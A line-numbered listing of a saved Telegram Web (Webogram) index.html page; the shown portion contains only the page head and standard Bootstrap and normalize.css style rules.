index.html 258 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884885886887888889890891892893894895896897898899900901902903904905906907908909910911912913914915916917918919920921922923924925926927928929930931932933934935936937938939940941942943944945946947948949950951952953954955956957958959960961962963964965966967968969970971972973974975976977978979980981982983984985986987988989990991992993994995996997998999100010011002100310041005100610071008100910101011101210131014101510161017101810191020102110221023102410251026102710281029103010311032103310341035103610371038103910401041104210431044104510461047104810491050105110521053105410551056105710581059106010611062106310641065106610671068106910701071107210731074107510761077107810791080108110821083108410851086108710881089109010911092109310941095109610971098109911001101110211031104110511061107110811091110111111121113111411151116111711181119112011211122112311241125112611271128112911301131113211331134113511361137113811391140114111421143114411451146114711481149115011511152115311541155115611571158115911601161116211631164116511661167116811691170117111721173117411751176117711781179118011811182118311841185118611871188118911901191119211931194119511961197119811991200120112021203120412051206120712081209121012111212121312141215121612171218121912201221122212231224122512261227122812291230123112321233123412351236123712381239124012411242124312441245124612471248124912501251125212531254125512561257125812591260126112621263126412651266126712681269127012711272127312741275127612771278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389139013911392139313941395139613971398139914001401140214031404140514061407140814091410141114121413141414151416141714181419142014211422142314241425142614271428142914301431143214331434143514361437143814391440144114421443144414451446144714481449145014511452145314541455145614571458145914601461146214631464146514661467146814691470147114721473147414751476147714781479148014811482148314841485148614871488148914901491149214931494149514961497149814991500150115021503150415051506150715081509151015111512151315141515151615171518151915201521152215231524152515261527152815291530153115321533153415351536153715381539154015411542154315441545154615471548154915501551155215531554155515561557155815591560156115621563156415651566156715681569157015711572157315741575157615771578157915801581158215831584158515861587158815891590159115921593159415951596159715981599160016011602160316041605160616071608160916101611161216131614161516161617161816191620162116221623162416251626162716281629163016311632163316341635163616371638163916401641164216431644164516461647164816491650165116521653165416551656165716581659166016611662166316641665166616671668166916701671167216731674167516761677167816791680168116821683168416851686168716881689169016911692169316941695169616971698169917001701170217031704170517061707170817091710171117121713171417151716171717181719172017211722172317241725172617271728172917301731173217331734173517361737173817391740174117421743174417451746174717481749175017511752175317541755175617571758175917601761176217631764176517661767176817691770177117721773177417751776177717781779178017811782178317841785178617871788178917901791179217931794179517961797179817991800180118021803180418051806180718081809181018111812181318141815181618171818181918201821182218231824182518261827182818291830183118321833183418351836183718381839184018411842184318441845184618471848184918501851185218531854185518561857185818591860186118621863186418651866186718681869187018711872187318741875187618771878187918801881188218831884188518861887188818891890189118921893189418951896189718981899190019011902190319041905190619071908190919101911191219131914191519161917191819191920192119221923192419251926192719281929193019311932193319341935193619371938193919401941194219431944194519461947194819491950195119521953195419551956195719581959196019611962196319641965196619671968196919701971197219731974197519761977197819791980198119821983198419851986198719881989199019911992199319941995199619971998199920002001200220032004200520062007200820092010201120122013201420152016201720182019202020212022202320242025202620272028202920302031203220332034203520362037203820392040204120422043204420452046204720482049205020512052205320542055205620572058205920602061206220632064206520662067206820692070207120722073207420752076207720782079208020812082208320842085208620872088208920902091209220932094209520962097209820992100210121022103210421052106210721082109211021112112211321142115211621172118211921202121212221232124212521262127212821292130213121322133213421352136213721382139214021412142214321442145214621472148214921502151215221532154215521562157215821592160216121622163216421652166216721682169217021712172217321742175217621772178217921802181218221832184218521862187218821892190219121922193219421952196219721982199220022012202220322042205220622072208220922102211221222132214221522162217221822192220222122222223222422252226222722282229223022312232223322342235223622372238223922402241224222432244224522462247224822492250225122522253225422552256225722582259226022612262226322642265226622672268226922702271227222732274227522762277227822792280228122822283228422852286228722882289229022912292229322942295229622972298229923002301230223032304230523062307230823092310231123122313231423152316231723182319232023212322232323242325232623272328232923302331233223332334233523362337233823392340234123422343234423452346234723482349235023512352235323542355235623572358235923602361236223632364236523662367236823692370237123722373237423752376237723782379238023812382238323842385238623872388238923902391239223932394239523962397239823992400240124022403240424052406240724082409241024112412241324142415241624172418241924202421242224232424242524262427242824292430243124322433243424352436243724382439244024412442244324442445244624472448244924502451245224532454245524562457245824592460246124622463246424652466246724682469247024712472247324742475247624772478247924802481248224832484248524862487248824892490249124922493249424952496249724982499250025012502250325042505250625072508250925102511251225132514251525162517251825192520252125222523252425252526252725282529253025312532253325342535253625372538253925402541254225432544254525462547254825492550255125522553255425552556255725582559256025612562256325642565256625672568256925702571257225732574257525762577257825792580258125822583258425852586258725882589259025912592259325942595259625972598259926002601260226032604260526062607260826092610261126122613261426152616261726182619262026212622262326242625262626272628262926302631263226332634263526362637263826392640264126422643264426452646264726482649265026512652265326542655265626572658265926602661266226632664266526662667266826692670267126722673267426752676267726782679268026812682268326842685268626872688268926902691269226932694269526962697269826992700270127022703270427052706270727082709271027112712271327142715271627172718271927202721272227232724272527262727272827292730273127322733273427352736273727382739274027412742274327442745274627472748274927502751275227532754275527562757275827592760276127622763276427652766276727682769277027712772277327742775277627772778277927802781278227832784278527862787278827892790279127922793279427952796279727982799280028012802280328042805280628072808280928102811281228132814281528162817281828192820282128222823282428252826282728282829283028312832283328342835283628372838283928402841284228432844284528462847284828492850285128522853285428552856285728582859286028612862286328642865286628672868286928702871287228732874287528762877287828792880288128822883288428852886288728882889289028912892289328942895289628972898289929002901290229032904290529062907290829092910291129122913291429152916291729182919292029212922292329242925292629272928292929302931293229332934293529362937293829392940294129422943294429452946294729482949295029512952295329542955295629572958295929602961296229632964296529662967296829692970297129722973297429752976297729782979298029812982298329842985298629872988298929902991299229932994299529962997299829993000300130023003300430053006300730083009301030113012301330143015301630173018301930203021302230233024302530263027302830293030303130323033303430353036303730383039304030413042304330443045304630473048304930503051305230533054305530563057305830593060306130623063306430653066306730683069307030713072307330743075307630773078307930803081308230833084308530863087308830893090309130923093309430953096309730983099310031013102310331043105310631073108310931103111311231133114311531163117311831193120312131223123312431253126312731283129313031313132313331343135313631373138313931403141314231433144314531463147314831493150315131523153315431553156315731583159316031613162316331643165316631673168316931703171317231733174317531763177317831793180318131823183318431853186318731883189319031913192319331943195319631973198319932003201320232033204320532063207320832093210321132123213321432153216321732183219322032213222322332243225322632273228322932303231323232333234323532363237323832393240324132423243324432453246324732483249325032513252325332543255325632573258325932603261326232633264326532663267326832693270327132723273327432753276327732783279328032813282328332843285328632873288328932903291329232933294329532963297329832993300330133023303330433053306330733083309331033113312331333143315331633173318331933203321332233233324332533263327332833293330333133323333333433353336333733383339334033413342334333443345334633473348334933503351335233533354335533563357335833593360336133623363336433653366336733683369337033713372337333743375337633773378337933803381338233833384338533863387338833893390339133923393339433953396339733983399340034013402340334043405340634073408340934103411341234133414341534163417341834193420342134223423342434253426342734283429343034313432343334343435343634373438343934403441344234433444344534463447344834493450345134523453345434553456345734583459346034613462346334643465346634673468346934703471347234733474347534763477347834793480348134823483348434853486348734883489349034913492349334943495349634973498349935003501350235033504350535063507350835093510351135123513351435153516351735183519352035213522352335243525352635273528352935303531353235333534353535363537353835393540354135423543354435453546354735483549355035513552355335543555355635573558355935603561356235633564356535663567356835693570357135723573357435753576357735783579358035813582358335843585358635873588358935903591359235933594359535963597359835993600360136023603360436053606360736083609361036113612361336143615361636173618361936203621362236233624362536263627362836293630363136323633363436353636363736383639364036413642364336443645364636473648364936503651365236533654365536563657365836593660366136623663366436653666366736683669367036713672367336743675367636773678367936803681368236833684368536863687368836893690369136923693369436953696369736983699370037013702370337043705370637073708370937103711371237133714371537163717371837193720372137223723372437253726372737283729373037313732373337343735373637373738373937403741374237433744374537463747374837493750375137523753375437553756375737583759376037613762376337643765376637673768376937703771377237733774377537763777377837793780378137823783378437853786378737883789379037913792379337943795379637973798379938003801380238033804380538063807380838093810381138123813381438153816381738183819382038213822382338243825382638273828382938303831383238333834383538363837383838393840384138423843384438453846384738483849385038513852385338543855385638573858385938603861386238633864386538663867386838693870387138723873387438753876387738783879388038813882388338843885388638873888388938903891389238933894389538963897389838993900390139023903390439053906390739083909391039113912391339143915391639173918391939203921392239233924392539263927392839293930393139323933393439353936393739383939394039413942394339443945394639473948394939503951395239533954395539563957395839593960396139623963396439653966396739683969397039713972397339743975397639773978397939803981398239833984398539863987398839893990399139923993399439953996399739983999400040014002400340044005400640074008400940104011401240134014401540164017401840194020402140224023402440254026402740284029403040314032403340344035403640374038403940404041404240434044404540464047404840494050405140524053405440554056405740584059406040614062406340644065406640674068406940704071407240734074407540764077407840794080408140824083408440854086408740884089409040914092409340944095409640974098409941004101410241034104410541064107410841094110411141124113411441154116411741184119412041214122412341244125412641274128412941304131413241334134413541364137413841394140414141424143414441454146414741484149415041514152415341544155415641574158415941604161416241634164416541664167416841694170417141724173417441754176417741784179418041814182
  1. <!DOCTYPE html><html manifest="webogram.appcache" ng-csp="" xmlns:ng="http://angularjs.org" id="ng-app" style="display: block; background: rgb(231, 235, 240) none repeat scroll 0% 0%;" lang="en"><head>
  2. <meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>Telegram Web</title><style data-savepage-href="css/app.css">@charset "UTF-8";
  3. .ng-cloak,.ng-hide:not(.ng-hide-animate),.x-ng-cloak,[data-ng-cloak],[ng-cloak],[ng\:cloak],[x-ng-cloak]{display:none!important}
  4. ng\:form{display:block}
  5. .ng-animate-shim{visibility:hidden}
  6. .ng-anchor{position:absolute}
  7. /*!
  8. * Bootstrap v3.2.0 (http://getbootstrap.com)
  9. * Copyright 2011-2014 Twitter, Inc.
  10. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
  11. */
  12. /*!
  13. * Generated using the Bootstrap Customizer (http://getbootstrap.com/customize/?id=ef8b2e1e74a6ba7423f1)
  14. * Config saved to config.json and https://gist.github.com/ef8b2e1e74a6ba7423f1
  15. */
  16. /*! normalize.css v3.0.1 | MIT License | git.io/normalize */
  17. html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}
  18. body{margin:0}
  19. article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}
  20. audio,canvas,progress,video{display:inline-block;vertical-align:baseline}
  21. audio:not([controls]){display:none;height:0}
  22. [hidden],template{display:none}
  23. a{background:0 0}
  24. a:active,a:hover{outline:0}
  25. b,strong{font-weight:700}
  26. dfn{font-style:italic}
  27. h1{margin:.67em 0}
  28. mark{background:#ff0;color:#000}
  29. sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}
  30. sup{top:-.5em}
  31. sub{bottom:-.25em}
  32. img{border:0}
  33. svg:not(:root){overflow:hidden}
  34. hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}
  35. code,kbd,pre,samp{font-size:1em}
  36. button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}
  37. button{overflow:visible}
  38. button,select{text-transform:none}
  39. button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}
  40. button[disabled],html input[disabled]{cursor:default}
  41. button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}
  42. input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}
  43. input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}
  44. input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}
  45. textarea{overflow:auto}
  46. optgroup{font-weight:700}
  47. table{border-collapse:collapse;border-spacing:0}
  48. td,th{padding:0}
  49. @media print{*{text-shadow:none!important;color:#000!important;background:0 0!important;box-shadow:none!important}
  50. a,a:visited{text-decoration:underline}
  51. a[href]:after{content:" (" attr(href) ")"}
  52. abbr[title]:after{content:" (" attr(title) ")"}
  53. a[href^="javascript:"]:after,a[href^="#"]:after{content:""}
  54. blockquote,pre{border:1px solid #999;page-break-inside:avoid}
  55. thead{display:table-header-group}
  56. img,tr{page-break-inside:avoid}
  57. img{max-width:100%!important}
  58. h2,h3,p{orphans:3;widows:3}
  59. h2,h3{page-break-after:avoid}
  60. select{background:#fff!important}
  61. .navbar{display:none}
  62. .table td,.table th{background-color:#fff!important}
  63. .btn>.caret,.dropup>.btn>.caret{border-top-color:#000!important}
  64. .label{border:1px solid #000}
  65. .table{border-collapse:collapse!important}
  66. .table-bordered td,.table-bordered th{border:1px solid #ddd!important}}
  67. *,:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}
  68. html{font-size:10px;-webkit-tap-highlight-color:transparent}
  69. body{line-height:1.42857143;background-color:#fff}
  70. button,input,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}
  71. a{color:#3a6d99;text-decoration:none}
  72. a:focus,a:hover{color:#3a6d99;text-decoration:underline}
  73. a:focus{outline:dotted thin;outline:-webkit-focus-ring-color auto 5px;outline-offset:-2px}
  74. figure{margin:0}
  75. img{vertical-align:middle}
  76. .carousel-inner>.item>a>img,.carousel-inner>.item>img,.img-responsive,.thumbnail a>img,.thumbnail>img{display:block;max-width:100%;height:auto}
  77. .img-rounded{border-radius:6px}
  78. .img-thumbnail{padding:4px;line-height:1.42857143;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;-o-transition:all .2s ease-in-out;transition:all .2s ease-in-out;display:inline-block;max-width:100%;height:auto}
  79. .img-circle{border-radius:50%}
  80. hr{margin-top:20px;margin-bottom:20px;border:0;border-top:1px solid #eee}
  81. .sr-only{position:absolute;width:1px;height:1px;margin:-1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);border:0}
  82. .sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;margin:0;overflow:visible;clip:auto}
  83. .h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{font-family:inherit;font-weight:500;line-height:1.1;color:inherit}
  84. .h1 .small,.h1 small,.h2 .small,.h2 small,.h3 .small,.h3 small,.h4 .small,.h4 small,.h5 .small,.h5 small,.h6 .small,.h6 small,h1 .small,h1 small,h2 .small,h2 small,h3 .small,h3 small,h4 .small,h4 small,h5 .small,h5 small,h6 .small,h6 small{font-weight:400;line-height:1;color:#999}
  85. .h1,.h2,.h3,h1,h2,h3{margin-top:20px;margin-bottom:10px}
  86. .h1 .small,.h1 small,.h2 .small,.h2 small,.h3 .small,.h3 small,h1 .small,h1 small,h2 .small,h2 small,h3 .small,h3 small{font-size:65%}
  87. .h4,.h5,.h6,h4,h5,h6{margin-top:10px;margin-bottom:10px}
  88. .h4 .small,.h4 small,.h5 .small,.h5 small,.h6 .small,.h6 small,h4 .small,h4 small,h5 .small,h5 small,h6 .small,h6 small{font-size:75%}
  89. .h1,h1{font-size:36px}
  90. .h2,h2{font-size:30px}
  91. .h3,h3{font-size:24px}
  92. .h4,h4{font-size:18px}
  93. .h5,h5{font-size:14px}
  94. .h6,h6{font-size:12px}
  95. p{margin:0 0 10px}
  96. .lead{margin-bottom:20px;font-size:16px;font-weight:300;line-height:1.4}
  97. @media (min-width:768px){.lead{font-size:21px}}
  98. .small,small{font-size:85%}
  99. cite{font-style:normal}
  100. .mark,mark{background-color:#fcf8e3;padding:.2em}
  101. .text-left{text-align:left}
  102. .text-right{text-align:right}
  103. .text-center{text-align:center}
  104. .text-justify{text-align:justify}
  105. .text-nowrap{white-space:nowrap}
  106. .text-lowercase{text-transform:lowercase}
  107. .text-uppercase{text-transform:uppercase}
  108. .text-capitalize{text-transform:capitalize}
  109. .text-muted{color:#999}
  110. .text-primary{color:#5d8db3}
  111. a.text-primary:hover{color:#477396}
  112. .text-success{color:#3c763d}
  113. a.text-success:hover{color:#2b542c}
  114. .text-info{color:#31708f}
  115. a.text-info:hover{color:#245269}
  116. .text-warning{color:#8a6d3b}
  117. a.text-warning:hover{color:#66512c}
  118. .text-danger{color:#a94442}
  119. a.text-danger:hover{color:#843534}
  120. .bg-primary{color:#fff;background-color:#5d8db3}
  121. a.bg-primary:hover{background-color:#477396}
  122. .bg-success{background-color:#dff0d8}
  123. a.bg-success:hover{background-color:#c1e2b3}
  124. .bg-info{background-color:#d9edf7}
  125. a.bg-info:hover{background-color:#afd9ee}
  126. .bg-warning{background-color:#fcf8e3}
  127. a.bg-warning:hover{background-color:#f7ecb5}
  128. .bg-danger{background-color:#f2dede}
  129. a.bg-danger:hover{background-color:#e4b9b9}
  130. .page-header{padding-bottom:9px;margin:40px 0 20px;border-bottom:1px solid #eee}
  131. ol,ul{margin-top:0;margin-bottom:10px}
  132. ol ol,ol ul,ul ol,ul ul{margin-bottom:0}
  133. .list-unstyled{padding-left:0;list-style:none}
  134. .list-inline{padding-left:0;list-style:none;margin-left:-5px}
  135. .list-inline>li{display:inline-block;padding-left:5px;padding-right:5px}
  136. dl{margin-top:0;margin-bottom:20px}
  137. dd,dt{line-height:1.42857143}
  138. dt{font-weight:700}
  139. dd{margin-left:0}
  140. @media (min-width:480px){.dl-horizontal dt{float:left;width:160px;clear:left;text-align:right;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
  141. .dl-horizontal dd{margin-left:180px}}
  142. abbr[data-original-title],abbr[title]{cursor:help;border-bottom:1px dotted #999}
  143. .initialism{font-size:90%;text-transform:uppercase}
  144. blockquote{padding:10px 20px;margin:0 0 20px;font-size:17.5px;border-left:5px solid #eee}
  145. blockquote ol:last-child,blockquote p:last-child,blockquote ul:last-child{margin-bottom:0}
  146. blockquote .small,blockquote footer,blockquote small{display:block;font-size:80%;line-height:1.42857143;color:#999}
  147. blockquote .small:before,blockquote footer:before,blockquote small:before{content:'\2014 \00A0'}
  148. .blockquote-reverse,blockquote.pull-right{padding-right:15px;padding-left:0;border-right:5px solid #eee;border-left:0;text-align:right}
  149. .blockquote-reverse .small:before,.blockquote-reverse footer:before,.blockquote-reverse small:before,blockquote.pull-right .small:before,blockquote.pull-right footer:before,blockquote.pull-right small:before{content:''}
  150. .blockquote-reverse .small:after,.blockquote-reverse footer:after,.blockquote-reverse small:after,blockquote.pull-right .small:after,blockquote.pull-right footer:after,blockquote.pull-right small:after{content:'\00A0 \2014'}
  151. blockquote:after,blockquote:before{content:""}
  152. address{margin-bottom:20px;font-style:normal;line-height:1.42857143}
  153. code,kbd,pre,samp{font-family:Menlo,Monaco,Consolas,"Courier New",monospace}
  154. code{padding:2px 4px;font-size:90%;color:#c7254e;background-color:#f9f2f4;border-radius:4px}
  155. kbd{padding:2px 4px;font-size:90%;color:#fff;background-color:#333;border-radius:3px;box-shadow:inset 0 -1px 0 rgba(0,0,0,.25)}
  156. kbd kbd{padding:0;font-size:100%;box-shadow:none}
  157. pre{display:block;margin:0 0 10px;line-height:1.42857143;word-break:break-all;word-wrap:break-word;color:#333;background-color:#f5f5f5;border-radius:4px}
  158. pre code{padding:0;font-size:inherit;color:inherit;white-space:pre-wrap;background-color:transparent;border-radius:0}
  159. .pre-scrollable{max-height:340px;overflow-y:scroll}
  160. .container,.container-fluid{margin-right:auto;margin-left:auto;padding-left:0;padding-right:0}
  161. @media (min-width:768px){.container{width:720px}}
  162. @media (min-width:992px){.container{width:940px}}
  163. @media (min-width:1200px){.container{width:1140px}}
  164. .row{margin-left:0;margin-right:0}
  165. .col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9{position:relative;min-height:1px;padding-left:0;padding-right:0}
  166. .col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9{float:left}
  167. .col-xs-12{width:100%}
  168. .col-xs-11{width:91.66666667%}
  169. .col-xs-10{width:83.33333333%}
  170. .col-xs-9{width:75%}
  171. .col-xs-8{width:66.66666667%}
  172. .col-xs-7{width:58.33333333%}
  173. .col-xs-6{width:50%}
  174. .col-xs-5{width:41.66666667%}
  175. .col-xs-4{width:33.33333333%}
  176. .col-xs-3{width:25%}
  177. .col-xs-2{width:16.66666667%}
  178. .col-xs-1{width:8.33333333%}
  179. .col-xs-pull-12{right:100%}
  180. .col-xs-pull-11{right:91.66666667%}
  181. .col-xs-pull-10{right:83.33333333%}
  182. .col-xs-pull-9{right:75%}
  183. .col-xs-pull-8{right:66.66666667%}
  184. .col-xs-pull-7{right:58.33333333%}
  185. .col-xs-pull-6{right:50%}
  186. .col-xs-pull-5{right:41.66666667%}
  187. .col-xs-pull-4{right:33.33333333%}
  188. .col-xs-pull-3{right:25%}
  189. .col-xs-pull-2{right:16.66666667%}
  190. .col-xs-pull-1{right:8.33333333%}
  191. .col-xs-pull-0{right:auto}
  192. .col-xs-push-12{left:100%}
  193. .col-xs-push-11{left:91.66666667%}
  194. .col-xs-push-10{left:83.33333333%}
  195. .col-xs-push-9{left:75%}
  196. .col-xs-push-8{left:66.66666667%}
  197. .col-xs-push-7{left:58.33333333%}
  198. .col-xs-push-6{left:50%}
  199. .col-xs-push-5{left:41.66666667%}
  200. .col-xs-push-4{left:33.33333333%}
  201. .col-xs-push-3{left:25%}
  202. .col-xs-push-2{left:16.66666667%}
  203. .col-xs-push-1{left:8.33333333%}
  204. .col-xs-push-0{left:auto}
  205. .col-xs-offset-12{margin-left:100%}
  206. .col-xs-offset-11{margin-left:91.66666667%}
  207. .col-xs-offset-10{margin-left:83.33333333%}
  208. .col-xs-offset-9{margin-left:75%}
  209. .col-xs-offset-8{margin-left:66.66666667%}
  210. .col-xs-offset-7{margin-left:58.33333333%}
  211. .col-xs-offset-6{margin-left:50%}
  212. .col-xs-offset-5{margin-left:41.66666667%}
  213. .col-xs-offset-4{margin-left:33.33333333%}
  214. .col-xs-offset-3{margin-left:25%}
  215. .col-xs-offset-2{margin-left:16.66666667%}
  216. .col-xs-offset-1{margin-left:8.33333333%}
  217. .col-xs-offset-0{margin-left:0}
  218. @media (min-width:768px){.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9{float:left}
  219. .col-sm-12{width:100%}
  220. .col-sm-11{width:91.66666667%}
  221. .col-sm-10{width:83.33333333%}
  222. .col-sm-9{width:75%}
  223. .col-sm-8{width:66.66666667%}
  224. .col-sm-7{width:58.33333333%}
  225. .col-sm-6{width:50%}
  226. .col-sm-5{width:41.66666667%}
  227. .col-sm-4{width:33.33333333%}
  228. .col-sm-3{width:25%}
  229. .col-sm-2{width:16.66666667%}
  230. .col-sm-1{width:8.33333333%}
  231. .col-sm-pull-12{right:100%}
  232. .col-sm-pull-11{right:91.66666667%}
  233. .col-sm-pull-10{right:83.33333333%}
  234. .col-sm-pull-9{right:75%}
  235. .col-sm-pull-8{right:66.66666667%}
  236. .col-sm-pull-7{right:58.33333333%}
  237. .col-sm-pull-6{right:50%}
  238. .col-sm-pull-5{right:41.66666667%}
  239. .col-sm-pull-4{right:33.33333333%}
  240. .col-sm-pull-3{right:25%}
  241. .col-sm-pull-2{right:16.66666667%}
  242. .col-sm-pull-1{right:8.33333333%}
  243. .col-sm-pull-0{right:auto}
  244. .col-sm-push-12{left:100%}
  245. .col-sm-push-11{left:91.66666667%}
  246. .col-sm-push-10{left:83.33333333%}
  247. .col-sm-push-9{left:75%}
  248. .col-sm-push-8{left:66.66666667%}
  249. .col-sm-push-7{left:58.33333333%}
  250. .col-sm-push-6{left:50%}
  251. .col-sm-push-5{left:41.66666667%}
  252. .col-sm-push-4{left:33.33333333%}
  253. .col-sm-push-3{left:25%}
  254. .col-sm-push-2{left:16.66666667%}
  255. .col-sm-push-1{left:8.33333333%}
  256. .col-sm-push-0{left:auto}
  257. .col-sm-offset-12{margin-left:100%}
  258. .col-sm-offset-11{margin-left:91.66666667%}
  259. .col-sm-offset-10{margin-left:83.33333333%}
  260. .col-sm-offset-9{margin-left:75%}
  261. .col-sm-offset-8{margin-left:66.66666667%}
  262. .col-sm-offset-7{margin-left:58.33333333%}
  263. .col-sm-offset-6{margin-left:50%}
  264. .col-sm-offset-5{margin-left:41.66666667%}
  265. .col-sm-offset-4{margin-left:33.33333333%}
  266. .col-sm-offset-3{margin-left:25%}
  267. .col-sm-offset-2{margin-left:16.66666667%}
  268. .col-sm-offset-1{margin-left:8.33333333%}
  269. .col-sm-offset-0{margin-left:0}}
  270. @media (min-width:992px){.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9{float:left}
  271. .col-md-12{width:100%}
  272. .col-md-11{width:91.66666667%}
  273. .col-md-10{width:83.33333333%}
  274. .col-md-9{width:75%}
  275. .col-md-8{width:66.66666667%}
  276. .col-md-7{width:58.33333333%}
  277. .col-md-6{width:50%}
  278. .col-md-5{width:41.66666667%}
  279. .col-md-4{width:33.33333333%}
  280. .col-md-3{width:25%}
  281. .col-md-2{width:16.66666667%}
  282. .col-md-1{width:8.33333333%}
  283. .col-md-pull-12{right:100%}
  284. .col-md-pull-11{right:91.66666667%}
  285. .col-md-pull-10{right:83.33333333%}
  286. .col-md-pull-9{right:75%}
  287. .col-md-pull-8{right:66.66666667%}
  288. .col-md-pull-7{right:58.33333333%}
  289. .col-md-pull-6{right:50%}
  290. .col-md-pull-5{right:41.66666667%}
  291. .col-md-pull-4{right:33.33333333%}
  292. .col-md-pull-3{right:25%}
  293. .col-md-pull-2{right:16.66666667%}
  294. .col-md-pull-1{right:8.33333333%}
  295. .col-md-pull-0{right:auto}
  296. .col-md-push-12{left:100%}
  297. .col-md-push-11{left:91.66666667%}
  298. .col-md-push-10{left:83.33333333%}
  299. .col-md-push-9{left:75%}
  300. .col-md-push-8{left:66.66666667%}
  301. .col-md-push-7{left:58.33333333%}
  302. .col-md-push-6{left:50%}
  303. .col-md-push-5{left:41.66666667%}
  304. .col-md-push-4{left:33.33333333%}
  305. .col-md-push-3{left:25%}
  306. .col-md-push-2{left:16.66666667%}
  307. .col-md-push-1{left:8.33333333%}
  308. .col-md-push-0{left:auto}
  309. .col-md-offset-12{margin-left:100%}
  310. .col-md-offset-11{margin-left:91.66666667%}
  311. .col-md-offset-10{margin-left:83.33333333%}
  312. .col-md-offset-9{margin-left:75%}
  313. .col-md-offset-8{margin-left:66.66666667%}
  314. .col-md-offset-7{margin-left:58.33333333%}
  315. .col-md-offset-6{margin-left:50%}
  316. .col-md-offset-5{margin-left:41.66666667%}
  317. .col-md-offset-4{margin-left:33.33333333%}
  318. .col-md-offset-3{margin-left:25%}
  319. .col-md-offset-2{margin-left:16.66666667%}
  320. .col-md-offset-1{margin-left:8.33333333%}
  321. .col-md-offset-0{margin-left:0}}
  322. @media (min-width:1200px){.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9{float:left}
  323. .col-lg-12{width:100%}
  324. .col-lg-11{width:91.66666667%}
  325. .col-lg-10{width:83.33333333%}
  326. .col-lg-9{width:75%}
  327. .col-lg-8{width:66.66666667%}
  328. .col-lg-7{width:58.33333333%}
  329. .col-lg-6{width:50%}
  330. .col-lg-5{width:41.66666667%}
  331. .col-lg-4{width:33.33333333%}
  332. .col-lg-3{width:25%}
  333. .col-lg-2{width:16.66666667%}
  334. .col-lg-1{width:8.33333333%}
  335. .col-lg-pull-12{right:100%}
  336. .col-lg-pull-11{right:91.66666667%}
  337. .col-lg-pull-10{right:83.33333333%}
  338. .col-lg-pull-9{right:75%}
